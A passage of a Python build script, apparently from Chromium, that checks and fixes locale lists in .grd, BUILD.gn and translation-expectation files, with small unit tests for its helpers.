_CONSOLE_CODE_MOVE_CURSOR_TO_COLUMN_0 + _CONSOLE_CODE_ERASE_LINE)
##########################################################################
##########################################################################
#####
##### G E N E R I C H E L P E R F U N C T I O N S
#####
##########################################################################
##########################################################################
def _FixChromiumLangAttribute(lang):
"""Map XML "lang" attribute values to Chromium locale names."""
_CHROMIUM_LANG_FIXES = {
'en': 'en-US', # For now, Chromium doesn't have an 'en' locale.
'iw': 'he', # 'iw' is the obsolete form of ISO 639-1 for Hebrew
'no': 'nb', # 'no' is used by the Translation Console for Norwegian (nb).
}
return _CHROMIUM_LANG_FIXES.get(lang, lang)
def _FixTranslationConsoleLocaleName(locale):
_FIXES = {
'nb': 'no', # Norwegian.
'he': 'iw', # Hebrew
}
return _FIXES.get(locale, locale)
def _CompareLocaleLists(list_a, list_expected, list_name):
"""Compare two lists of locale names. Print errors if they differ.
Args:
list_a: First list of locales.
list_expected: Second list of locales, as expected.
list_name: Name of list printed in error messages.
Returns:
On success, return False. On error, print error messages and return True.
"""
errors = []
missing_locales = sorted(set(list_a) - set(list_expected))
if missing_locales:
errors.append('Missing locales: %s' % missing_locales)
extra_locales = sorted(set(list_expected) - set(list_a))
if extra_locales:
errors.append('Unexpected locales: %s' % extra_locales)
if errors:
print('Errors in %s definition:' % list_name)
for error in errors:
print(' %s\n' % error)
return True
return False
def _BuildIntervalList(input_list, predicate):
"""Find ranges of contiguous list items that pass a given predicate.
Args:
input_list: An input list of items of any type.
predicate: A function that takes a list item and return True if it
passes a given test.
Returns:
A list of (start_pos, end_pos) tuples, where all items in
[start_pos, end_pos) pass the predicate.
"""
result = []
size = len(input_list)
start = 0
while True:
# Find first item in list that passes the predicate.
while start < size and not predicate(input_list[start]):
start += 1
if start >= size:
return result
# Find first item in the rest of the list that does not pass the
# predicate.
end = start + 1
while end < size and predicate(input_list[end]):
end += 1
result.append((start, end))
start = end + 1
def _SortListSubRange(input_list, start, end, key_func):
"""Sort an input list's sub-range according to a specific key function.
Args:
input_list: An input list.
start: Sub-range starting position in list.
end: Sub-range limit position in list.
key_func: A function that extracts a sort key from a line.
Returns:
A copy of |input_list|, with all items in [|start|, |end|) sorted
according to |key_func|.
"""
result = input_list[:start]
inputs = []
for pos in xrange(start, end):
line = input_list[pos]
key = key_func(line)
inputs.append((key, line))
for _, line in sorted(inputs):
result.append(line)
result += input_list[end:]
return result
def _SortElementsRanges(lines, element_predicate, element_key):
"""Sort all elements of a given type in a list of lines by a given key.
Args:
lines: input lines.
element_predicate: predicate function to select elements to sort.
element_key: lambda returning a comparison key for each element that
passes the predicate.
Returns:
A new list of input lines, with lines [start..end) sorted.
"""
intervals = _BuildIntervalList(lines, element_predicate)
for start, end in intervals:
lines = _SortListSubRange(lines, start, end, element_key)
return lines
def _ProcessFile(input_file, locales, check_func, fix_func):
"""Process a given input file, potentially fixing it.
Args:
input_file: Input file path.
locales: List of Chrome locales to consider / expect.
check_func: A lambda called to check the input file lines with
(input_lines, locales) argument. It must return an list of error
messages, or None on success.
fix_func: None, or a lambda called to fix the input file lines with
(input_lines, locales). It must return the new list of lines for
the input file, and may raise an Exception in case of error.
Returns:
True at the moment.
"""
print('%sProcessing %s...' % (_CONSOLE_START_LINE, input_file), end=' ')
sys.stdout.flush()
with open(input_file) as f:
input_lines = f.readlines()
errors = check_func(input_file, input_lines, locales)
if errors:
print('\n%s%s' % (_CONSOLE_START_LINE, '\n'.join(errors)))
if fix_func:
try:
input_lines = fix_func(input_file, input_lines, locales)
output = ''.join(input_lines)
with open(input_file, 'wt') as f:
f.write(output)
print('Fixed %s.' % input_file)
except Exception as e: # pylint: disable=broad-except
print('Skipped %s: %s' % (input_file, e))
return True
def _ScanDirectoriesForFiles(scan_dirs, file_predicate):
"""Scan a directory for files that match a given predicate.
Args:
scan_dir: A list of top-level directories to start scan in.
file_predicate: lambda function which is passed the file's base name
and returns True if its full path, relative to |scan_dir|, should be
passed in the result.
Returns:
A list of file full paths.
"""
result = []
for src_dir in scan_dirs:
for root, _, files in os.walk(src_dir):
result.extend(os.path.join(root, f) for f in files if file_predicate(f))
return result
def _WriteFile(file_path, file_data):
"""Write |file_data| to |file_path|."""
with open(file_path, 'w') as f:
f.write(file_data)
def _FindGnExecutable():
"""Locate the real GN executable used by this Chromium checkout.
This is needed because the depot_tools 'gn' wrapper script will look
for .gclient and other things we really don't need here.
Returns:
Path of real host GN executable from current Chromium src/ checkout.
"""
# Simply scan buildtools/*/gn and return the first one found so we don't
# have to guess the platform-specific sub-directory name (e.g. 'linux64'
# for 64-bit Linux machines).
buildtools_dir = os.path.join(_TOP_SRC_DIR, 'buildtools')
for subdir in os.listdir(buildtools_dir):
subdir_path = os.path.join(buildtools_dir, subdir)
if not os.path.isdir(subdir_path):
continue
gn_path = os.path.join(subdir_path, 'gn')
if os.path.exists(gn_path):
return gn_path
return None
def _PrettyPrintListAsLines(input_list, available_width, trailing_comma=False):
result = []
input_str = ', '.join(input_list)
while len(input_str) > available_width:
pos = input_str.rfind(',', 0, available_width)
result.append(input_str[:pos + 1])
input_str = input_str[pos + 1:].lstrip()
if trailing_comma and input_str:
input_str += ','
result.append(input_str)
return result
class _PrettyPrintListAsLinesTest(unittest.TestCase):
def test_empty_list(self):
self.assertListEqual([''], _PrettyPrintListAsLines([], 10))
def test_wrapping(self):
input_list = ['foo', 'bar', 'zoo', 'tool']
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 8),
['foo,', 'bar,', 'zoo,', 'tool'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 12), ['foo, bar,', 'zoo, tool'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 79), ['foo, bar, zoo, tool'])
def test_trailing_comma(self):
input_list = ['foo', 'bar', 'zoo', 'tool']
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 8, trailing_comma=True),
['foo,', 'bar,', 'zoo,', 'tool,'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 12, trailing_comma=True),
['foo, bar,', 'zoo, tool,'])
self.assertListEqual(
_PrettyPrintListAsLines(input_list, 79, trailing_comma=True),
['foo, bar, zoo, tool,'])
##########################################################################
##########################################################################
#####
##### L O C A L E S L I S T S
#####
##########################################################################
##########################################################################
# Various list of locales that will be extracted from build/config/locales.gni
# Do not use these directly, use ChromeLocales(), AndroidAPKOmittedLocales() and
# IosUnsupportedLocales() instead to access these lists.
_INTERNAL_CHROME_LOCALES = []
_INTERNAL_ANDROID_APK_OMITTED_LOCALES = []
_INTERNAL_IOS_UNSUPPORTED_LOCALES = []
def ChromeLocales():
"""Return the list of all locales supported by Chrome."""
if not _INTERNAL_CHROME_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_CHROME_LOCALES
def AndroidAPKOmittedLocales():
"""Return the list of locales omitted from Android APKs."""
if not _INTERNAL_ANDROID_APK_OMITTED_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_ANDROID_APK_OMITTED_LOCALES
def IosUnsupportedLocales():
"""Return the list of locales that are unsupported on iOS."""
if not _INTERNAL_IOS_UNSUPPORTED_LOCALES:
_ExtractAllChromeLocalesLists()
return _INTERNAL_IOS_UNSUPPORTED_LOCALES
def _PrepareTinyGnWorkspace(work_dir, out_subdir_name='out'):
"""Populate an empty directory with a tiny set of working GN config files.
This allows us to run 'gn gen <out> --root <work_dir>' as fast as possible
to generate files containing the locales list. This takes about 300ms on
a decent machine, instead of more than 5 seconds when running the equivalent
commands from a real Chromium workspace, which requires regenerating more
than 23k targets.
Args:
work_dir: target working directory.
out_subdir_name: Name of output sub-directory.
Returns:
Full path of output directory created inside |work_dir|.
"""
# Create top-level .gn file that must point to the BUILDCONFIG.gn.
_WriteFile(os.path.join(work_dir, '.gn'),
'buildconfig = "//BUILDCONFIG.gn"\n')
# Create BUILDCONFIG.gn which must set a default toolchain. Also add
# all variables that may be used in locales.gni in a declare_args() block.
_WriteFile(
os.path.join(work_dir, 'BUILDCONFIG.gn'),
r'''set_default_toolchain("toolchain")
declare_args () {
is_ios = false
is_android = true
}
''')
# Create fake toolchain required by BUILDCONFIG.gn.
os.mkdir(os.path.join(work_dir, 'toolchain'))
_WriteFile(os.path.join(work_dir, 'toolchain', 'BUILD.gn'),
r'''toolchain("toolchain") {
tool("stamp") {
command = "touch {{output}}" # Required by action()
}
}
''')
# Create top-level BUILD.gn, GN requires at least one target to build so do
# that with a fake action which will never be invoked. Also write the locales
# to misc files in the output directory.
_WriteFile(
os.path.join(work_dir, 'BUILD.gn'), r'''import("//locales.gni")
action("create_foo") { # fake action to avoid GN complaints.
script = "//build/create_foo.py"
inputs = []
outputs = [ "$target_out_dir/$target_name" ]
}
# Write the locales lists to files in the output directory.
_filename = root_build_dir + "/foo"
write_file(_filename + ".locales", locales, "json")
write_file(_filename + ".android_apk_omitted_locales",
android_apk_omitted_locales,
"json")
write_file(_filename + ".ios_unsupported_locales",
ios_unsupported_locales,
"json")
''')
# Copy build/config/locales.gni to the workspace, as required by BUILD.gn.
shutil.copyfile(os.path.join(_TOP_SRC_DIR, 'build', 'config', 'locales.gni'),
os.path.join(work_dir, 'locales.gni'))
# Create output directory.
out_path = os.path.join(work_dir, out_subdir_name)
os.mkdir(out_path)
# And ... we're good.
return out_path
# Set this global variable to the path of a given temporary directory
# before calling _ExtractAllChromeLocalesLists() if you want to debug
# the locales list extraction process.
_DEBUG_LOCALES_WORK_DIR = None
def _ReadJsonList(file_path):
"""Read a JSON file that must contain a list, and return it."""
with open(file_path) as f:
data = json.load(f)
assert isinstance(data, list), "JSON file %s is not a list!" % file_path
return [item.encode('utf8') for item in data]
def _ExtractAllChromeLocalesLists():
with build_utils.TempDir() as tmp_path:
if _DEBUG_LOCALES_WORK_DIR:
tmp_path = _DEBUG_LOCALES_WORK_DIR
build_utils.DeleteDirectory(tmp_path)
build_utils.MakeDirectory(tmp_path)
out_path = _PrepareTinyGnWorkspace(tmp_path, 'out')
# NOTE: The file suffixes used here should be kept in sync with
# build/config/locales.gni
gn_executable = _FindGnExecutable()
try:
subprocess.check_output(
[gn_executable, 'gen', out_path, '--root=' + tmp_path])
except subprocess.CalledProcessError as e:
print(e.output)
raise e
global _INTERNAL_CHROME_LOCALES
_INTERNAL_CHROME_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.locales'))
global _INTERNAL_ANDROID_APK_OMITTED_LOCALES
_INTERNAL_ANDROID_APK_OMITTED_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.android_apk_omitted_locales'))
global _INTERNAL_IOS_UNSUPPORTED_LOCALES
_INTERNAL_IOS_UNSUPPORTED_LOCALES = _ReadJsonList(
os.path.join(out_path, 'foo.ios_unsupported_locales'))
##########################################################################
##########################################################################
#####
##### G R D H E L P E R F U N C T I O N S
#####
##########################################################################
##########################################################################
# Technical note:
#
# Even though .grd files are XML, an xml parser library is not used in order
# to preserve the original file's structure after modification. ElementTree
# tends to re-order attributes in each element when re-writing an XML
# document tree, which is undesirable here.
#
# Thus simple line-based regular expression matching is used instead.
#
# Misc regular expressions used to match elements and their attributes.
_RE_OUTPUT_ELEMENT = re.compile(r'<output (.*)\s*/>')
_RE_TRANSLATION_ELEMENT = re.compile(r'<file( | .* )path="(.*\.xtb)".*/>')
_RE_FILENAME_ATTRIBUTE = re.compile(r'filename="([^"]*)"')
_RE_LANG_ATTRIBUTE = re.compile(r'lang="([^"]*)"')
_RE_PATH_ATTRIBUTE = re.compile(r'path="([^"]*)"')
_RE_TYPE_ANDROID_ATTRIBUTE = re.compile(r'type="android"')
def _IsGritInputFile(input_file):
"""Returns True iff this is a GRIT input file."""
return input_file.endswith('.grd')
def _GetXmlLangAttribute(xml_line):
"""Extract the lang attribute value from an XML input line."""
m = _RE_LANG_ATTRIBUTE.search(xml_line)
if not m:
return None
return m.group(1)
class _GetXmlLangAttributeTest(unittest.TestCase):
TEST_DATA = {
'': None,
'foo': None,
'lang=foo': None,
'lang="foo"': 'foo',
'<something lang="foo bar" />': 'foo bar',
'<file lang="fr-CA" path="path/to/strings_fr-CA.xtb" />': 'fr-CA',
}
def test_GetXmlLangAttribute(self):
for test_line, expected in self.TEST_DATA.iteritems():
self.assertEquals(_GetXmlLangAttribute(test_line), expected)
def _SortGrdElementsRanges(grd_lines, element_predicate):
"""Sort all .grd elements of a given type by their lang attribute."""
return _SortElementsRanges(grd_lines, element_predicate, _GetXmlLangAttribute)
def _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales):
"""Check the element 'lang' attributes in specific .grd lines range.
This really checks the following:
- Each item has a correct 'lang' attribute.
- There are no duplicated lines for the same 'lang' attribute.
- That there are no extra locales that Chromium doesn't want.
- That no wanted locale is missing.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
locales = set()
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
errors.append('%d: Missing "lang" attribute in <output> element' % pos +
1)
continue
cr_locale = _FixChromiumLangAttribute(lang)
if cr_locale in locales:
errors.append(
'%d: Redefinition of <output> for "%s" locale' % (pos + 1, lang))
locales.add(cr_locale)
extra_locales = locales.difference(wanted_locales)
if extra_locales:
errors.append('%d-%d: Extra locales found: %s' % (start + 1, end + 1,
sorted(extra_locales)))
missing_locales = wanted_locales.difference(locales)
if missing_locales:
errors.append('%d-%d: Missing locales: %s' % (start + 1, end + 1,
sorted(missing_locales)))
return errors
##########################################################################
##########################################################################
#####
##### G R D A N D R O I D O U T P U T S
#####
##########################################################################
##########################################################################
def _IsGrdAndroidOutputLine(line):
"""Returns True iff this is an Android-specific <output> line."""
m = _RE_OUTPUT_ELEMENT.search(line)
if m:
return 'type="android"' in m.group(1)
return False
assert _IsGrdAndroidOutputLine(' <output type="android"/>')
# Many of the functions below have unused arguments due to genericity.
# pylint: disable=unused-argument
def _CheckGrdElementRangeAndroidOutputFilename(grd_lines, start, end,
wanted_locales):
"""Check all <output> elements in specific input .grd lines range.
This really checks the following:
- Filenames exist for each listed locale.
- Filenames are well-formed.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
continue
cr_locale = _FixChromiumLangAttribute(lang)
m = _RE_FILENAME_ATTRIBUTE.search(line)
if not m:
errors.append('%d: Missing filename attribute in <output> element' % pos +
1)
else:
filename = m.group(1)
if not filename.endswith('.xml'):
errors.append(
'%d: Filename should end with ".xml": %s' % (pos + 1, filename))
dirname = os.path.basename(os.path.dirname(filename))
prefix = ('values-%s' % resource_utils.ToAndroidLocaleName(cr_locale)
if cr_locale != _DEFAULT_LOCALE else 'values')
if dirname != prefix:
errors.append(
'%s: Directory name should be %s: %s' % (pos + 1, prefix, filename))
return errors
def _CheckGrdAndroidOutputElements(grd_file, grd_lines, wanted_locales):
"""Check all <output> elements related to Android.
Args:
grd_file: Input .grd file path.
grd_lines: List of input .grd lines.
wanted_locales: set of wanted Chromium locale names.
Returns:
List of error message strings. Empty on success.
"""
intervals = _BuildIntervalList(grd_lines, _IsGrdAndroidOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales)
errors += _CheckGrdElementRangeAndroidOutputFilename(grd_lines, start, end,
wanted_locales)
return errors
def _AddMissingLocalesInGrdAndroidOutputs(grd_file, grd_lines, wanted_locales):
"""Fix an input .grd line by adding missing Android outputs.
Args:
grd_file: Input .grd file path.
grd_lines: Input .grd line list.
wanted_locales: set of Chromium locale names.
Returns:
A new list of .grd lines, containing new <output> elements when needed
for locales from |wanted_locales| that were not part of the input.
"""
intervals = _BuildIntervalList(grd_lines, _IsGrdAndroidOutputLine)
for start, end in reversed(intervals):
locales = set()
for pos in xrange(start, end):
lang = _GetXmlLangAttribute(grd_lines[pos])
locale = _FixChromiumLangAttribute(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'bg'
src_lang_attribute = 'lang="%s"' % src_locale
src_line = None
for pos in xrange(start, end):
if src_lang_attribute in grd_lines[pos]:
src_line = grd_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find <output> element with "%s" lang attribute' % src_locale)
line_count = end - 1
for locale in missing_locales:
android_locale = resource_utils.ToAndroidLocaleName(locale)
dst_line = src_line.replace(
'lang="%s"' % src_locale, 'lang="%s"' % locale).replace(
'values-%s/' % src_locale, 'values-%s/' % android_locale)
grd_lines.insert(line_count, dst_line)
line_count += 1
# Sort the new <output> elements.
return _SortGrdElementsRanges(grd_lines, _IsGrdAndroidOutputLine)
##########################################################################
##########################################################################
#####
##### G R D T R A N S L A T I O N S
#####
##########################################################################
##########################################################################
def _IsTranslationGrdOutputLine(line):
"""Returns True iff this is an output .xtb <file> element."""
m = _RE_TRANSLATION_ELEMENT.search(line)
return m is not None
class _IsTranslationGrdOutputLineTest(unittest.TestCase):
def test_GrdTranslationOutputLines(self):
_VALID_INPUT_LINES = [
'<file path="foo/bar.xtb" />',
'<file path="foo/bar.xtb"/>',
'<file lang="fr-CA" path="translations/aw_strings_fr-CA.xtb"/>',
'<file lang="fr-CA" path="translations/aw_strings_fr-CA.xtb" />',
' <file path="translations/aw_strings_ar.xtb" lang="ar" />',
]
_INVALID_INPUT_LINES = ['<file path="foo/bar.xml" />']
for line in _VALID_INPUT_LINES:
self.assertTrue(
_IsTranslationGrdOutputLine(line),
'_IsTranslationGrdOutputLine() returned False for [%s]' % line)
for line in _INVALID_INPUT_LINES:
self.assertFalse(
_IsTranslationGrdOutputLine(line),
'_IsTranslationGrdOutputLine() returned True for [%s]' % line)
def _CheckGrdTranslationElementRange(grd_lines, start, end,
wanted_locales):
"""Check all <translations> sub-elements in specific input .grd lines range.
This really checks the following:
- Each item has a 'path' attribute.
- Each such path value ends up with '.xtb'.
Args:
grd_lines: Input .grd lines.
start: Sub-range start position in input line list.
end: Sub-range limit position in input line list.
wanted_locales: Set of wanted Chromium locale names.
Returns:
List of error message strings for this input. Empty on success.
"""
errors = []
for pos in xrange(start, end):
line = grd_lines[pos]
lang = _GetXmlLangAttribute(line)
if not lang:
continue
m = _RE_PATH_ATTRIBUTE.search(line)
if not m:
errors.append('%d: Missing path attribute in <file> element' % pos +
1)
else:
filename = m.group(1)
if not filename.endswith('.xtb'):
errors.append(
'%d: Path should end with ".xtb": %s' % (pos + 1, filename))
return errors
def _CheckGrdTranslations(grd_file, grd_lines, wanted_locales):
"""Check all <file> elements that correspond to an .xtb output file.
Args:
grd_file: Input .grd file path.
grd_lines: List of input .grd lines.
wanted_locales: set of wanted Chromium locale names.
Returns:
List of error message strings. Empty on success.
"""
wanted_locales = wanted_locales - set([_DEFAULT_LOCALE])
intervals = _BuildIntervalList(grd_lines, _IsTranslationGrdOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGrdElementRangeLang(grd_lines, start, end, wanted_locales)
errors += _CheckGrdTranslationElementRange(grd_lines, start, end,
wanted_locales)
return errors
# Regular expression used to replace the lang attribute inside .xtb files.
_RE_TRANSLATIONBUNDLE = re.compile('<translationbundle lang="(.*)">')
def _CreateFakeXtbFileFrom(src_xtb_path, dst_xtb_path, dst_locale):
"""Create a fake .xtb file.
Args:
src_xtb_path: Path to source .xtb file to copy from.
dst_xtb_path: Path to destination .xtb file to write to.
dst_locale: Destination locale, the lang attribute in the source file
will be substituted with this value before its lines are written
to the destination file.
"""
with open(src_xtb_path) as f:
src_xtb_lines = f.readlines()
def replace_xtb_lang_attribute(line):
m = _RE_TRANSLATIONBUNDLE.search(line)
if not m:
return line
return line[:m.start(1)] + dst_locale + line[m.end(1):]
dst_xtb_lines = [replace_xtb_lang_attribute(line) for line in src_xtb_lines]
with build_utils.AtomicOutput(dst_xtb_path) as tmp:
tmp.writelines(dst_xtb_lines)
def _AddMissingLocalesInGrdTranslations(grd_file, grd_lines, wanted_locales):
"""Fix an input .grd line by adding missing Android outputs.
This also creates fake .xtb files from the one provided for 'en-GB'.
Args:
grd_file: Input .grd file path.
grd_lines: Input .grd line list.
wanted_locales: set of Chromium locale names.
Returns:
A new list of .grd lines, containing new <output> elements when needed
for locales from |wanted_locales| that were not part of the input.
"""
wanted_locales = wanted_locales - set([_DEFAULT_LOCALE])
intervals = _BuildIntervalList(grd_lines, _IsTranslationGrdOutputLine)
for start, end in reversed(intervals):
locales = set()
for pos in xrange(start, end):
lang = _GetXmlLangAttribute(grd_lines[pos])
locale = _FixChromiumLangAttribute(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'en-GB'
src_lang_attribute = 'lang="%s"' % src_locale
src_line = None
for pos in xrange(start, end):
if src_lang_attribute in grd_lines[pos]:
src_line = grd_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find <file> element with "%s" lang attribute' % src_locale)
src_path = os.path.join(
os.path.dirname(grd_file),
_RE_PATH_ATTRIBUTE.search(src_line).group(1))
line_count = end - 1
for locale in missing_locales:
dst_line = src_line.replace(
'lang="%s"' % src_locale, 'lang="%s"' % locale).replace(
'_%s.xtb' % src_locale, '_%s.xtb' % locale)
grd_lines.insert(line_count, dst_line)
line_count += 1
dst_path = src_path.replace('_%s.xtb' % src_locale, '_%s.xtb' % locale)
_CreateFakeXtbFileFrom(src_path, dst_path, locale)
# Sort the new <output> elements.
return _SortGrdElementsRanges(grd_lines, _IsTranslationGrdOutputLine)
##########################################################################
##########################################################################
#####
##### G N A N D R O I D O U T P U T S
#####
##########################################################################
##########################################################################
_RE_GN_VALUES_LIST_LINE = re.compile(
r'^\s*".*values(\-([A-Za-z0-9-]+))?/.*\.xml",\s*$')
def _IsBuildGnInputFile(input_file):
"""Returns True iff this is a BUILD.gn file."""
return os.path.basename(input_file) == 'BUILD.gn'
def _GetAndroidGnOutputLocale(line):
"""Check a GN list, and return its Android locale if it is an output .xml"""
m = _RE_GN_VALUES_LIST_LINE.match(line)
if not m:
return None
if m.group(1): # First group is optional and contains group 2.
return m.group(2)
return resource_utils.ToAndroidLocaleName(_DEFAULT_LOCALE)
def _IsAndroidGnOutputLine(line):
"""Returns True iff this is an Android-specific localized .xml output."""
return _GetAndroidGnOutputLocale(line) != None
def _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
"""Check that a range of GN lines corresponds to localized strings.
Special case: Some BUILD.gn files list several non-localized .xml files
that should be ignored by this function, e.g. in
components/cronet/android/BUILD.gn, the following appears:
inputs = [
...
"sample/res/layout/activity_main.xml",
"sample/res/layout/dialog_url.xml",
"sample/res/values/dimens.xml",
"sample/res/values/strings.xml",
...
]
These are non-localized strings, and should be ignored. This function is
used to detect them quickly.
"""
for pos in xrange(start, end):
if not 'values/' in gn_lines[pos]:
return True
return False
def _CheckGnOutputsRange(gn_lines, start, end, wanted_locales):
if not _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
return []
errors = []
locales = set()
for pos in xrange(start, end):
line = gn_lines[pos]
android_locale = _GetAndroidGnOutputLocale(line)
assert android_locale != None
cr_locale = resource_utils.ToChromiumLocaleName(android_locale)
if cr_locale in locales:
errors.append('%s: Redefinition of output for "%s" locale' %
(pos + 1, android_locale))
locales.add(cr_locale)
extra_locales = locales.difference(wanted_locales)
if extra_locales:
errors.append('%d-%d: Extra locales: %s' % (start + 1, end + 1,
sorted(extra_locales)))
missing_locales = wanted_locales.difference(locales)
if missing_locales:
errors.append('%d-%d: Missing locales: %s' % (start + 1, end + 1,
sorted(missing_locales)))
return errors
def _CheckGnAndroidOutputs(gn_file, gn_lines, wanted_locales):
intervals = _BuildIntervalList(gn_lines, _IsAndroidGnOutputLine)
errors = []
for start, end in intervals:
errors += _CheckGnOutputsRange(gn_lines, start, end, wanted_locales)
return errors
def _AddMissingLocalesInGnAndroidOutputs(gn_file, gn_lines, wanted_locales):
intervals = _BuildIntervalList(gn_lines, _IsAndroidGnOutputLine)
# NOTE: Since this may insert new lines to each interval, process the
# list in reverse order to maintain valid (start,end) positions during
# the iteration.
for start, end in reversed(intervals):
if not _CheckGnOutputsRangeForLocalizedStrings(gn_lines, start, end):
continue
locales = set()
for pos in xrange(start, end):
lang = _GetAndroidGnOutputLocale(gn_lines[pos])
locale = resource_utils.ToChromiumLocaleName(lang)
locales.add(locale)
missing_locales = wanted_locales.difference(locales)
if not missing_locales:
continue
src_locale = 'bg'
src_values = 'values-%s/' % resource_utils.ToAndroidLocaleName(src_locale)
src_line = None
for pos in xrange(start, end):
if src_values in gn_lines[pos]:
src_line = gn_lines[pos]
break
if not src_line:
raise Exception(
'Cannot find output list item with "%s" locale' % src_locale)
line_count = end - 1
for locale in missing_locales:
if locale == _DEFAULT_LOCALE:
dst_line = src_line.replace('values-%s/' % src_locale, 'values/')
else:
dst_line = src_line.replace(
'values-%s/' % src_locale,
'values-%s/' % resource_utils.ToAndroidLocaleName(locale))
gn_lines.insert(line_count, dst_line)
line_count += 1
gn_lines = _SortListSubRange(
gn_lines, start, line_count,
lambda line: _RE_GN_VALUES_LIST_LINE.match(line).group(1))
return gn_lines
##########################################################################
##########################################################################
#####
##### T R A N S L A T I O N E X P E C T A T I O N S
#####
##########################################################################
##########################################################################
_EXPECTATIONS_FILENAME = 'translation_expectations.pyl'
# Technical note: the format of translation_expectations.pyl
# is a 'Python literal', which defines a python dictionary, so should
# be easy to parse. However, when modifying it, care should be taken
# to respect the line comments and the order of keys within the text
# file.
def _ReadPythonLiteralFile(pyl_path):
"""Read a .pyl file into a Python data structure."""
with open(pyl_path) as f:
pyl_content = f.read()
# Evaluate as a Python data structure, use an empty global
# and local dictionary.
return eval(pyl_content, dict(), dict())
def _UpdateLocalesInExpectationLines(pyl_lines,
wanted_locales,
available_width=79):
"""Update the locales list(s) found in an expectations file.
Args:
pyl_lines: Iterable of input lines from the file.
wanted_locales: Set or list of new locale names.
available_width: Optional, number of character colums used
to word-wrap the new list items.
Returns:
New list of updated lines.
"""
locales_list = ['"%s"' % loc for loc in sorted(wanted_locales)]
result = []
line_count = len(pyl_lines)
line_num = 0
DICT_START = '"languages": ['
while line_num < line_count:
line = pyl_lines[line_num]
line_num += 1
result.append(line)
# Look for start of "languages" dictionary.
pos = line.find(DICT_START)
if pos < 0:
continue
start_margin = pos
start_line = line_num
# Skip over all lines from the list.
while (line_num < line_count and
not pyl_lines[line_num].rstrip().endswith('],')):
line_num += 1
continue
if line_num == line_count:
raise Exception('%d: Missing list termination!' % start_line)
# Format the new list according to the new margin.
locale_width = available_width - (start_margin + 2)
locale_lines = _PrettyPrintListAsLines(
locales_list, locale_width, trailing_comma=True)
for locale_line in locale_lines:
result.append(' ' * (start_margin + 2) + locale_line)
result.append(' ' * start_margin + '],')
line_num += 1
return result
class _UpdateLocalesInExpectationLinesTest(unittest.TestCase):
def test_simple(self):
self.maxDiff = 1000
input_text = r'''
# This comment should be preserved
# 23456789012345678901234567890123456789
{
"android_grd": {
"languages": [
"aa", "bb", "cc", "dd", "ee",
"ff", "gg", "hh", "ii", "jj",
"kk"],
},
# Example with bad indentation in input.
"another_grd": {
"languages": [
"aa", "bb", "cc", "dd", "ee", "ff", "gg", "hh", "ii", "jj", "kk",
],
},
}
'''
expected_text = r'''
# This comment should be preserved
# 23456789012345678901234567890123456789
{
"android_grd": {
"languages": [
"A2", "AA", "BB", "CC", "DD",
"E2", "EE", "FF", "GG", "HH",
"I2", "II", "JJ", "KK",
],
},
# Example with bad indentation in input.
"another_grd": {
"languages": [
"A2", "AA", "BB", "CC", "DD",
"E2", "EE", "FF", "GG", "HH",
"I2", "II", "JJ", "KK",
],
},
}
'''
input_lines = input_text.splitlines()
test_locales = ([
'AA', 'BB', 'CC', 'DD', 'EE', 'FF', 'GG', 'HH', 'II', 'JJ', 'KK', 'A2',
'E2', 'I2'
])
expected_lines = expected_text.splitlines()
self.assertListEqual(
_UpdateLocalesInExpectationLines(input_lines, test_locales, 40),
expected_lines)
def test_missing_list_termination(self):
input_lines = r'''
"languages": ['
"aa", "bb", "cc", "dd"
'''.splitlines()
with self.assertRaises(Exception) as cm:
_UpdateLocalesInExpectationLines(input_lines, ['a', 'b'], 40)
self.assertEqual(str(cm.exception), '2: Missing list termination!')
def _UpdateLocalesInExpectationFile(pyl_path, wanted_locales):
"""Update all locales listed in a given expectations file.
Args:
pyl_path: Path to .pyl file to update.
wanted_locales: List of locales that need to be written to
the file.
"""
tc_locales = {
_FixTranslationConsoleLocaleName(locale)
for locale in set(wanted_locales) - set([_DEFAULT_LOCALE])
}
with open(pyl_path) as f:
input_lines = [l.rstrip() for l in f.readlines()]
updated_lines = _UpdateLocalesInExpectationLines(input_lines, tc_locales)
with build_utils.AtomicOutput(pyl_path) as f:
f.writelines('\n'.join(updated_lines) + '\n')
##########################################################################
##########################################################################
#####
##### C H E C K E V E R Y T H I N G
#####
##########################################################################
##########################################################################
# pylint: enable=unused-argument
def _IsAllInputFile(input_file):
return _IsGritInputFile(input_file) or _IsBuildGnInputFile(input_file)
def _CheckAllFiles(input_file, input_lines, wanted_locales):
errors = []
if _IsGritInputFile(input_file):
errors += _CheckGrdTranslations(input_file, input_lines, wanted_locales)
errors += _CheckGrdAndroidOutputElements(
input_file, input_lines, wanted_locales)
elif _IsBuildGnInputFile(input_file):
errors += _CheckGnAndroidOutputs(input_file, input_lines, wanted_locales)
return errors
def _AddMissingLocalesInAllFiles(input_file, input_lines, wanted_locales):
if _IsGritInputFile(input_file):
lines = _AddMissingLocalesInGrdTranslations(
input_file, input_lines, wanted_locales)
